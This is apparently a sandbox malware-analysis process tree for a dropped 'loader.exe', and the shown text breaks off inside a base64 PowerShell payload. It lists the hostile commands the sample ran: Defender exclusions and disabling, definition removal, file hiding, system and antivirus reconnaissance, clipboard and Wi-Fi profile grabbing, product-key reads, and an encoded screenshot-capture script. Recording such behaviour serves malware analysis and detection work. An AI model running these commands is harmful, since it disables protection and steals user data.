C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:2120

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:2820

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\loader.exe""
3⤵
PID:2880

C:\Windows\SysWOW64\PING.EXE
ping localhost -n 3
4⤵
- Runs ping.exe
PID:2960

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:684

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:412

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3052

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffdab3fab58,0x7ffdab3fab68,0x7ffdab3fab78
2⤵
PID:3492

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1784 --field-trial-handle=2032,i,11792393637684950656,4585452115108014052,131072 /prefetch:2
2⤵
PID:5088

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1984 --field-trial-handle=2032,i,11792393637684950656,4585452115108014052,131072 /prefetch:8
2⤵
PID:1956

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2284 --field-trial-handle=2032,i,11792393637684950656,4585452115108014052,131072 /prefetch:8
2⤵
PID:1528

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3000 --field-trial-handle=2032,i,11792393637684950656,4585452115108014052,131072 /prefetch:1
2⤵
PID:4900

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3008 --field-trial-handle=2032,i,11792393637684950656,4585452115108014052,131072 /prefetch:1
2⤵
PID:4468

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3668 --field-trial-handle=2032,i,11792393637684950656,4585452115108014052,131072 /prefetch:1
2⤵
PID:4076

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4752 --field-trial-handle=2032,i,11792393637684950656,4585452115108014052,131072 /prefetch:8
2⤵
PID:3504

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4904 --field-trial-handle=2032,i,11792393637684950656,4585452115108014052,131072 /prefetch:8
2⤵
PID:628

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4960 --field-trial-handle=2032,i,11792393637684950656,4585452115108014052,131072 /prefetch:8
2⤵
PID:4220

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=4340 --field-trial-handle=2032,i,11792393637684950656,4585452115108014052,131072 /prefetch:1
2⤵
PID:3880

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4976 --field-trial-handle=2032,i,11792393637684950656,4585452115108014052,131072 /prefetch:8
2⤵
PID:3556

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=3004 --field-trial-handle=2032,i,11792393637684950656,4585452115108014052,131072 /prefetch:1
2⤵
PID:456

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=3200 --field-trial-handle=2032,i,11792393637684950656,4585452115108014052,131072 /prefetch:1
2⤵
PID:4232

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=3368 --field-trial-handle=2032,i,11792393637684950656,4585452115108014052,131072 /prefetch:1
2⤵
PID:5116

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5188 --field-trial-handle=2032,i,11792393637684950656,4585452115108014052,131072 /prefetch:8
2⤵
PID:3544

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4348 --field-trial-handle=2032,i,11792393637684950656,4585452115108014052,131072 /prefetch:8
2⤵
PID:1836

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1624 --field-trial-handle=2032,i,11792393637684950656,4585452115108014052,131072 /prefetch:2
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2728

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=5588 --field-trial-handle=2032,i,11792393637684950656,4585452115108014052,131072 /prefetch:1
2⤵
PID:5064

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3400 --field-trial-handle=2032,i,11792393637684950656,4585452115108014052,131072 /prefetch:8
2⤵
PID:2272

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5144 --field-trial-handle=2032,i,11792393637684950656,4585452115108014052,131072 /prefetch:8
2⤵
PID:348

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5136 --field-trial-handle=2032,i,11792393637684950656,4585452115108014052,131072 /prefetch:8
2⤵
PID:3996

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2816 --field-trial-handle=2032,i,11792393637684950656,4585452115108014052,131072 /prefetch:8
2⤵
PID:3944

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5196 --field-trial-handle=2032,i,11792393637684950656,4585452115108014052,131072 /prefetch:8
2⤵
PID:4632

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4548 --field-trial-handle=2032,i,11792393637684950656,4585452115108014052,131072 /prefetch:8
2⤵
PID:4312

C:\Users\Admin\Downloads\loader.exe
"C:\Users\Admin\Downloads\loader.exe"
2⤵
- Executes dropped EXE
PID:1176

C:\Users\Admin\Downloads\loader.exe
"C:\Users\Admin\Downloads\loader.exe"
3⤵
- Blocklisted process makes network request
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
PID:4892

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\loader.exe'"
4⤵
PID:2868

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\loader.exe'
5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3076

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
4⤵
PID:1256

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
5⤵
- Suspicious behavior: EnumeratesProcesses
PID:3620

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
4⤵
PID:4252

C:\Windows\SysWOW64\tasklist.exe
tasklist /FO LIST
5⤵
- Enumerates processes with tasklist
PID:2352

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
4⤵
PID:3056

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic csproduct get uuid
5⤵
PID:4960

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
4⤵
PID:1040

C:\Windows\SysWOW64\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
5⤵
PID:3948

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
4⤵
PID:1872

C:\Windows\SysWOW64\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
5⤵
PID:1716

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
4⤵
PID:1788

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic path win32_VideoController get name
5⤵
- Detects videocard installed
PID:3140

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
4⤵
PID:1064

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic path win32_VideoController get name
5⤵
- Detects videocard installed
PID:4220

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\Downloads\loader.exe""
4⤵
- Hide Artifacts: Hidden Files and Directories
PID:4028

C:\Windows\SysWOW64\attrib.exe
attrib +h +s "C:\Users\Admin\Downloads\loader.exe"
5⤵
- Views/modifies file attributes
PID:4372

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\    .scr'"
4⤵
PID:4568

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\    .scr'
5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:336

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
4⤵
PID:1420

C:\Windows\SysWOW64\tasklist.exe
tasklist /FO LIST
5⤵
- Enumerates processes with tasklist
PID:1052

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
4⤵
PID:2496

C:\Windows\SysWOW64\tasklist.exe
tasklist /FO LIST
5⤵
- Enumerates processes with tasklist
PID:3056

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
4⤵
PID:1040

C:\Windows\SysWOW64\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
5⤵
PID:5580

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
4⤵
PID:2300

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
- Suspicious behavior: EnumeratesProcesses
PID:5656

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
4⤵
PID:1532

C:\Windows\SysWOW64\tasklist.exe
tasklist /FO LIST
5⤵
- Enumerates processes with tasklist
PID:5704

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
4⤵
PID:2612

C:\Windows\SysWOW64\tree.com
tree /A /F
5⤵
PID:5616

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
4⤵
PID:4204

C:\Windows\SysWOW64\netsh.exe
netsh wlan show profile
5⤵
- Event Triggered Execution: Netsh Helper DLL
PID:5832

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
4⤵
PID:2592

C:\Windows\SysWOW64\systeminfo.exe
systeminfo
5⤵
- Gathers system information
PID:5640

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
4⤵
PID:2520

C:\Windows\SysWOW64\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
5⤵
PID:5648

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
4⤵
PID:688

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAI